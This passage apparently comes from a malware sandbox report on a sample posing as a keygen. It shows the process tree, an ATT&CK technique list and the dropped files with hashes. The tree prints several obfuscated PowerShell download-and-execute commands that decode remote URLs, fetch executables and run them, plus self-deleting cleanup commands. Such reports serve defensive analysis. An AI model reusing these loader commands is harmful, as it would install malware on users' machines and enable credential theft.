                        PID:1952
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:664
                          • C:\Users\Public\tob.exe
                            "C:\Users\Public\tob.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3000
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                              6⤵
                              • Loads dropped DLL
                              PID:1836
                              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1912
                                • C:\Windows\SysWOW64\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                                  8⤵
                                  • Loads dropped DLL
                                  PID:2408
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    9⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1564
                                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                      10⤵
                                      • Executes dropped EXE
                                      PID:2748
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:2484
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2484 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\080575446526738\\* & exit
                                    9⤵
                                      PID:1620
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /pid 2484
                                        10⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1644
                              • C:\Users\Public\tob.exe
                                "C:\Users\Public\tob.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:1608
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\36AA.tmp\b1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:1916
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1344
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 2
                          3⤵
                          • Delays execution with timeout.exe
                          PID:1972
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\36AA.tmp\ba.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:676
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Blocklisted process makes network request
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1832
                            • C:\Users\Public\jow.exe
                              "C:\Users\Public\jow.exe"
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:3068
                              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:2176
                                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:2368
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2368 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\581953248426880\\* & exit
                                    8⤵
                                      PID:1832
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /pid 2368
                                        9⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2164
                                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2228
                                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2412
                                • C:\Users\Public\jow.exe
                                  "C:\Users\Public\jow.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:2296
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\36AA.tmp\ba1.hta"
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of WriteProcessMemory
                            PID:1380
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1580

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Defense Evasion

                      Modify Registry

                      6
                      T1112

                      Disabling Security Tools

                      2
                      T1089

                      Install Root Certificate

                      1
                      T1130

                      Credential Access

                      Credentials in Files

                      3
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\MSVCP140.dll
                      • C:\ProgramData\VCRUNTIME140.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59397ac4-fa4c-42f7-8d7f-cb9d40cb4aa4
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5ae7af5d-b727-4a31-9bdc-7be8f01406c0
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cd450dc3-0ca3-4c24-a4ce-84d46bdab16d
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f06663e3-7ba2-4c87-9770-61b42daceb45
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Temp\0tSvXRYXPm.exe
                      • C:\Users\Admin\AppData\Local\Temp\0tSvXRYXPm.exe
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\b.hta
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\b1.hta
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\ba.hta
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\ba1.hta
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\m.hta
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\m1.hta
                      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\start.bat
                      • C:\Users\Admin\AppData\Local\Temp\6JiIhxc6bK.exe
                      • C:\Users\Admin\AppData\Local\Temp\6JiIhxc6bK.exe
                      • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\qbyhBnpv2D.exe
                      • C:\Users\Admin\AppData\Local\Temp\qbyhBnpv2D.exe
                      • C:\Users\Admin\AppData\Local\Temp\uj1q6nONt1.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\uj1q6nONt1.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Public\Natso.bat
                      • C:\Users\Public\Natso.bat
                      • C:\Users\Public\fjo.exe
                      • C:\Users\Public\fjo.exe
                      • C:\Users\Public\fjo.exe
                      • C:\Users\Public\jow.exe
                      • C:\Users\Public\jow.exe
                      • C:\Users\Public\jow.exe
                      • C:\Users\Public\tob.exe
                      • C:\Users\Public\tob.exe
                      • C:\Users\Public\tob.exe
                      • C:\Windows\temp\vfuukxkm.inf
                      • \??\PIPE\lsarpc
                      • \??\PIPE\srvsvc
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\msvcp140.dll
                      • \ProgramData\msvcp140.dll
                      • \ProgramData\msvcp140.dll
                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\sqlite3.dll
                      • \ProgramData\sqlite3.dll
                      • \ProgramData\sqlite3.dll
                      • \ProgramData\vcruntime140.dll
                      • \ProgramData\vcruntime140.dll
                      • \ProgramData\vcruntime140.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                        MD5

                        02cc7b8ee30056d5912de54f1bdfc219

                        SHA1

                        a6923da95705fb81e368ae48f93d28522ef552fb

                        SHA256

                        1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                        SHA512

                        0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                      • \Users\Admin\AppData\LocalLow\sqlite3.dll
                      • \Users\Admin\AppData\Local\Temp\0tSvXRYXPm.exe
                      • \Users\Admin\AppData\Local\Temp\36AA.tmp\Keygen.exe
                      • \Users\Admin\AppData\Local\Temp\6JiIhxc6bK.exe
                      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • \Users\Admin\AppData\Local\Temp\qbyhBnpv2D.exe
                      • \Users\Admin\AppData\Local\Temp\uj1q6nONt1.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • \Users\Public\fjo.exe
                      • \Users\Public\fjo.exe
                      • \Users\Public\jow.exe
